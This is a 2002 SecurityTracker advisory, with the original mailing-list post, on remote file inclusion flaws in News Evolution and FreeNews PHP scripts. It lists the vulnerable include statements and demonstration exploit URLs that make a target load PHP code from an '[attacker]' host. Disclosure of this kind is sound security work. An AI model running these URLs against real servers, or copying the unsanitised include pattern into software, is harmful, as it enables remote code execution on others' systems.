News Evolution Forum Software Include File Bug Lets Remote Users Execute Arbitrary Commands on the System
|
|
SecurityTracker Alert ID: 1005718 |
|
CVE Reference: GENERIC-MAP-NOMATCH
(Links to External Site)
|
Date: Nov 26 2002
|
Impact: Execution of arbitrary code via network, User access via network
|
Version(s): 1.0, 2.0
|
Description: An include file vulnerability was reported in News Evolution. A remote user can execute arbitrary commands on the server.
It is reported that several modules contain include statements that allow a remote user to specify a remote location for the include
file. The statements in News Evolution 1.0 are reported to be in the aff_news.php, moteur/moteur.php, and export_news.php scripts.
The statements in News Evolution 2.0 are reported to be in backend.php, screen.php, and admin/modules/comment.php.
A remote
user can create arbitrary PHP code and locate it on a remote server. Then, the remote user can issue a specially crafted URL to
the target server that specifies the remote PHP code for inclusion.
A demonstration exploit URL for News Evolution 1.0 is provided:
http://[target]/aff_news.php?che
min=http://[attacker]/
with
http://[attacker]/config.php
http://[attacker]/functions.inc.php
http://[attacker]/options.inc.php
A
demonstration exploit URL for News Evolution 2.0 is provided:
http://[target]/screen.php?neurl=http://[attacker]
with :
http://[attacker]/admin/cfg/configsql.inc.php
http://[attacker]/admin/cfg/configscreen.inc.php
http://[attacker]/admin/cfg/configsite.inc.php
http://[attacker]/admin/cfg/configtache.inc.php
http://[attacker]/adm
in/fonctions/fctscr.php
http://[attacker]/admin/fonctions/fctadmin.php
http://[attacker]/admin/fonctions/fctform.php
http://[attacker]/admin/modules/cache.php
|
Impact: A remote user can execute arbitrary commands on the system.
|
Solution: No solution was available at the time of this entry.
|
Vendor URL: www.phpevolution.net/index.php?to=newsevolution (Links to External Site)
|
Cause: Input validation error
|
Underlying OS: Linux (Any), UNIX (Any), Windows (Any)
|
Reported By: "Frog Man" <leseulfrog@hotmail.com>
|
Message History:
None.
|
Source Message Contents
|
Date: Tue, 26 Nov 2002 17:43:49 +0100
From: "Frog Man" <leseulfrog@hotmail.com>
Subject: FreeNews & News Evolution (PHP)
|
Informations :
°°°°°°°°°°°°°°
Problem : Include files
a) -------------------
Product : Freenews
Version : 2.1
Website : http://www.prologin.fr
----------------------
b) -------------------
Product : News Evolution
Versions : 1.0, 2.0
Website : http://www.phpevolution.net
----------------------
PHP Code/Location :
°°°°°°°°°°°°°°°°°°°
a) freenews 2.1
aff_news.php :
-------------------------------------------------
include ("$chemin/config.php");
include ("$chemin/options.inc.php");
include ("$chemin/freenews_functions.inc.php");
-------------------------------------------------
...
b) News Evolution 1.0
aff_news.php :
-------------------------------------
include ("$chemin/config.php");
include ("$chemin/functions.inc.php");
include ("$chemin/options.inc.php");
-------------------------------------
moteur/moteur.php :
--------------------------------------------------
include ("$chemin/moteur/moteur_form.php");
include ("$chemin/moteur/moteur_tab_results.php");
--------------------------------------------------
export_news.php :
---------------------------------------
include ("$chemin/config.php");
include ("$chemin/functions.inc.php");
include ("$chemin/options.inc.php");
include("$chemin/exporthtm.inc.php");
---------------------------------------
...
c) News Evolution 2.0
backend.php :
---------------------------------------------------------
include_once("$neurl/admin/modules/rss/easyRSS.inc.php");
---------------------------------------------------------
screen.php :
---------------------------------------------------------
include_once("$neurl/admin/cfg/configsql.inc.php");
include_once("$neurl/admin/cfg/configscreen.inc.php");
include_once("$neurl/admin/cfg/configsite.inc.php");
include_once("$neurl/admin/cfg/configtache.inc.php");
include_once("$neurl/admin/$sitelang");
include_once("$neurl/admin/fonctions/fctscr.php");
include_once("$neurl/admin/fonctions/fctadmin.php");
include_once("$neurl/admin/fonctions/fctform.php");
include_once("$neurl/admin/modules/cache.php");
---------------------------------------------------------
admin/modules/comment.php :
---------------------------------------------------------
@include_once("$neurl/admin/cfg/configscreen.inc.php");
@include_once("$neurl/admin/cfg/configsite.inc.php");
@include_once("$neurl/admin/$sitelang");
---------------------------------------------------------
...
Exploits :
°°°°°°°°°°
a) freenews 2.1
http://[target]/aff_news.php?chemin=http://[attacker]
with
http://[attacker]/config.php
http://[attacker]/options.inc.php
http://[attacker]/freenews_functions.inc.php
...
b) News Evolution 1.0
http://[target]/aff_news.php?chemin=http://[attacker]/
with
http://[attacker]/config.php
http://[attacker]/functions.inc.php
http://[attacker]/options.inc.php
...
c) News Evolution 2.0
http://[target]/screen.php?neurl=http://[attacker]
with :
http://[attacker]/admin/cfg/configsql.inc.php
http://[attacker]/admin/cfg/configscreen.inc.php
http://[attacker]/admin/cfg/configsite.inc.php
http://[attacker]/admin/cfg/configtache.inc.php
http://[attacker]/admin/fonctions/fctscr.php
http://[attacker]/admin/fonctions/fctadmin.php
http://[attacker]/admin/fonctions/fctform.php
http://[attacker]/admin/modules/cache.php
...
Patch :
°°°°°°°
http://www.phpsecure.org
More details :
°°°°°°°°°°°°°°
In French :
http://www.frog-man.org/tutos/NEfree.txt
Translated by Google :
http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FNEfree.txt&langpa
ir=fr%7Cen&hl=en&ie=ISO-8859-1&prev=%2Flanguage_tools
frog-m@n
_________________________________________________________________
MSN Messenger : discutez en direct avec vos amis !
http://www.msn.fr/msger/default.asp
|
|
